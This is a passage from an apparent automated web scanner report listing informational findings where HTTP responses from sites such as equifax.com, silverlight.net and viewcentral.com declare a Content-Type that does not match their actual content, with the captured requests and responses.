User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:54 GMT
Content-length: 25452
Content-type: text/plain
Last-modified: Thu, 10 Feb 2011 22:11:54 GMT
Etag: "636c-4d5462aa"
Accept-ranges: bytes

wOFF......cl................................FFTM...l........Z...GDEF.......8...D....OS/2.......X...`..Wscmap..............B.cvt .......T...T...+fpgm...........e../.gasp................glyf......U.....
...[SNIP]...

33.29. http://equifax.com/free30daytrial/css/slatestd-boldcondensed-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://equifax.com
Path:   /free30daytrial/css/slatestd-boldcondensed-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /free30daytrial/css/slatestd-boldcondensed-webfont.woff HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:44 GMT
Content-length: 22976
Content-type: text/plain
Last-modified: Wed, 16 Mar 2011 01:34:22 GMT
Etag: "59c0-4d80139e"
Accept-ranges: bytes

wOFF......Y........L........................FFTM...l........X.I.GDEF.......2...8.;..OS/2.......X...`.Xq}cmap.......z......A.cvt .......0...0.1..fpgm...........e../.gasp...t............glyf......L....x
...[SNIP]...

33.30. http://equifax.com/free30daytrial/css/slatestd-condensed-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://equifax.com
Path:   /free30daytrial/css/slatestd-condensed-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /free30daytrial/css/slatestd-condensed-webfont.woff HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:53 GMT
Content-length: 27372
Content-type: text/plain
Last-modified: Thu, 10 Feb 2011 22:11:53 GMT
Etag: "6aec-4d5462a9"
Accept-ranges: bytes

wOFF......j.................................FFTM...l........X...GDEF.......2...8.;..OS/2.......W...`.A..cmap.......z......A.cvt .......d...d&b!.fpgm...........e../.gasp................glyf......].....
...[SNIP]...

33.31. http://equifax.com/free30daytrial/css/slatestd-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://equifax.com
Path:   /free30daytrial/css/slatestd-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /free30daytrial/css/slatestd-webfont.woff HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:51 GMT
Content-length: 27696
Content-type: text/plain
Last-modified: Thu, 10 Feb 2011 22:11:53 GMT
Etag: "6c30-4d5462a9"
Accept-ranges: bytes

wOFF......l0................................FFTM...l........Z...GDEF.......8...D....OS/2.......X...`.lT.cmap..............B.cvt .......Z...Z...&fpgm...........e../.gasp................glyf......^\....
...[SNIP]...

33.32. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=66999E404DA47B8328EFAE652A2EDCD7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Sun, 24 Apr 2011 12:30:27 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289668");

33.33. http://evintl-aia.verisign.com/EVIntl2006.cer  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://evintl-aia.verisign.com
Path:   /EVIntl2006.cer

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /EVIntl2006.cer HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Proxy-Connection: Keep-Alive
Host: evintl-aia.verisign.com

Response

HTTP/1.0 200 OK
Age: 125
Date: Sun, 24 Apr 2011 03:15:59 GMT
Connection: Keep-Alive
Via: NS-248
ETag: "1d8051-60e-8a570a00"
Server: Apache/2.2.2 (Unix)
Last-Modified: Fri, 01 Dec 2006 22:30:00 GMT
Accept-Ranges: bytes
Content-Length: 1550
Content-Type: text/plain
X-Cache: HIT from hostname

0..
0...........*.m7..o..|.....0.    *.H.......0..1.0    ..U....US1.0...U.
..VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign
...[SNIP]...

33.34. http://feeds.delicious.com/v2/json/urlinfo/data  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://feeds.delicious.com
Path:   /v2/json/urlinfo/data

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v2/json/urlinfo/data?url=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&callback=gig_pc_delicious_1303674277175_9435312000568956 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:30 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.4
Content-Length: 51

gig_pc_delicious_1303674277175_9435312000568956([])

33.35. http://fightidentitytheft.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fightidentitytheft.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: fightidentitytheft.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 24 Apr 2011 19:44:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=p2zKdokhzQEkAAAAMDEyMjYyNmUtYzRkNy00Mjg2LWIwYzMtMjZjNDI2ZGUzNjM20; expires=Mon, 23-Apr-2012 19:44:15 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=230b3f9e-98d3-4fd8-8226-019169d79ef6; domain=fightidentitytheft.hubspot.com; expires=Sat, 24-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT133=454104236.0.0000; path=/
Content-Length: 496


var hsUse20Servers = true;
var hsDayEndsIn = 29744;
var hsWeekEndsIn = 29744;
var hsMonthEndsIn = 548144;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-24 15:44:1
...[SNIP]...

33.36. http://i1.iis.net/resources/images/bloggers/shanselman.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i1.iis.net
Path:   /resources/images/bloggers/shanselman.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /resources/images/bloggers/shanselman.jpg?cdn_id=52867178000v1 HTTP/1.1
Host: i1.iis.net
Proxy-Connection: keep-alive
Referer: http://www.iis.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnonymous=qiQvI5sCzAEkAAAAYmU0YTE1NTQtYjU0MC00NmM4LWIzNTgtYmI4NmU0OTdhYTI20

Response

HTTP/1.1 200 OK
Content-Length: 4070
Content-Type: image/jpeg
Last-Modified: Fri, 06 Nov 2009 18:40:42 GMT
Accept-Ranges: bytes
ETag: "0f1a6a4105fca1:0",""
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=31031234
Date: Sun, 24 Apr 2011 15:59:12 GMT
Connection: close

.PNG
.
...IHDR...(...(......./:....gAMA......a.....tEXtSoftware.Paint.NET v3.317.w....yIDATXG]XgT.g.%.d...gg~..9If..q.&1....)..b@.(B.".$@.I4...PC.IH.D.H....6..........8..`.p........=....=.s.{...l...
...[SNIP]...

33.37. http://i2.silverlight.net/avatar/anonymous.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.silverlight.net
Path:   /avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634392426000000000&cdn_id=04212011-001 HTTP/1.1
Host: i2.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sun, 24 Apr 2011 15:21:01 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3600
Expires: Sun, 24 Apr 2011 16:52:58 GMT
Date: Sun, 24 Apr 2011 15:52:58 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

33.38. http://i3.silverlight.net/avatar/anonymous.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i3.silverlight.net
Path:   /avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634392429000000000&cdn_id=04212011-001 HTTP/1.1
Host: i3.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sun, 24 Apr 2011 15:00:32 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3600
Expires: Sun, 24 Apr 2011 16:55:07 GMT
Date: Sun, 24 Apr 2011 15:55:07 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

33.39. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img1.wsimg.com
Path:   /rcc/portraittemplates/img_resell_model_m2.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /rcc/portraittemplates/img_resell_model_m2.jpg HTTP/1.1
Host: img1.wsimg.com
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 32768
Content-Type: image/jpeg
Last-Modified: Wed, 26 May 2004 18:49:12 GMT
Accept-Ranges: bytes
ETag: "04498225243c41:1072"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:06 GMT
Connection: close

......JFIF.....`.`.....C....................................................................C............................................................................"..............................
...[SNIP]...

33.40. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://www.reputationmanagementconsultants.com/?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:32:52 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 25-Apr-2012 00:32:52 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>

33.41. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/cbt.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /events/uploads/arcsight/cbt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4679
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:17 GMT
Accept-Ranges: bytes
ETag: "ba58a1ac38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx....o\.}..s...3...3.R.e..-+Fe7Hb').6E.@.C..u...0...!h..    .....@..M.".[..5]..V......DI.)q........p(.6c.r..#..~.9..m..!|*.....|*.."...../..........7.7.Ro....O<.
...[SNIP]...

33.42. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/ilt.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /events/uploads/arcsight/ilt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 5786
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:27:56 GMT
Accept-Ranges: bytes
ETag: "fce4b7c338e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#...aIDATx...[........]U}......3....D.^JYH.5l....x.v.H....N.<..$y.K. A^d./..'/I@X..z.u......6)..I.9W...vO......9'.]U..3.H......vsX.:.W..;.....W.+..}.F>.x....z..e2....,
...[SNIP]...

33.43. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/vlt.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /events/uploads/arcsight/vlt.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4135
Content-Type: image/jpeg
Last-Modified: Thu, 22 Apr 2010 16:29:07 GMT
Accept-Ranges: bytes
ETag: "905d3eee38e2ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

.PNG
.
...IHDR...H...9.......m#....IDATx.......u..{oU.{.......p(>dK4hQ..v..~"..]. .'{#.,.7dc..B.[...<.....#K.EJ6..lqf(.Cq....p.....{o.U=.|...=......~U.....{...O....>.O.........2.E....ZJ..\9}........
...[SNIP]...

33.44. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://javadl-esd.sun.com
Path:   /update/AU/map-2.0.3.1.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.3.1.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 24 Apr 2011 15:11:17 GMT
Connection: close
Cache-Control: private

File not found.

33.45. http://krypt.com/active/cart/add.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://krypt.com
Path:   /active/cart/add.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /active/cart/add.html?package=65 HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:37:50 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:37:53 GMT; path=/; domain=.krypt.com
Content-Length: 7
Content-Type: text/html

SUCCESS

33.46. http://l.apture.com/v3/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v3/?1=%7B%22isTMMEnabled%22%3A1%2C%22fullBarEnabled%22%3Atrue%2C%22numLinks%22%3A2%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1131%2C%22siteId%22%3A163422%2C%22visitId%22%3A145225182493858%2C%22pageId%22%3A64532487%7D HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
Origin: http://www.infusionblog.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 25 Apr 2011 01:40:09 GMT
Connection: close

{}

33.47. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

